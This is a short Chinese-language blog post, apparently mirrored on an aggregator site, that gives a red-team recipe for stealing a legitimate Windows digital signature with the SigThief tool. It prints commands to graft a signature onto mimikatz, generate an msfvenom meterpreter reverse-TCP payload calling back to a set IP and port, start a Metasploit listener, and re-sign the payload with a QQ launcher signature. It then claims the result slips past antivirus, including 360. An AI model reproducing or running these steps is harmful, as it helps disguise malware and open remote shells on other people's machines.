数字签名混淆 - 走看看

zoukankan html css js c++ java

数字签名混淆
Github

https://github.com/secretsquirrel/SigThief

Sigthief是劫持合法的数字签名并绕过Windows的哈希验证机制可以被红队用于将恶意二进制文件和PowerShell脚本与本机操作系统文件混合，以逃避检测并绕过设备防护。

1.首先是Github上的实例：

从一个二进制签名，并将其添加到另一个二进制文件

python sigthief.py -i c:WindowsSystem32consent.exe -t mimikatz.exe -o mimi.exe

借用msfvenom的payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.3.5 LPORT=4445 -f exe > lonsheng.exe
　　

启动监听模块
use exploit/multi/handler set LHOST 192.168.3.5 set LPORT 4445
　　

cd 进数字签名混淆的文件然后
python sigthief.py -i E:QQBinQQScLauncher.exe -t C:UsershackerDesktoplonsheng.exe -o jiu.exe
　　

然后运行jiu.exe可以看见返回了一个meterpreter

然后扔到http://r.virscan.org查毒

明显降低了查杀率而且还能过360

我们看看jiu.exe和longsheng.exe的对比
查看全文

相关阅读:
[C++设计模式]observer 观察者模式
 Codeforces 425A Sereja and Swaps（暴力枚举）
linux中设置TAB键的宽度
 iOS 常见面试图总结2
网络爬虫初步：从訪问网页到数据解析
 大数据时代之hadoop(二)：hadoop脚本解析
 数据格式,訪问信息以及操作数指示符
 javaScript实现日历控件
 每一个程序猿都须要了解的一个SQL技巧
 OpenGL编程逐步深入（九）插值处理

原文地址：https://www.cnblogs.com/haq5201314/p/8213906.html

Copyright © 2011-2022 走看看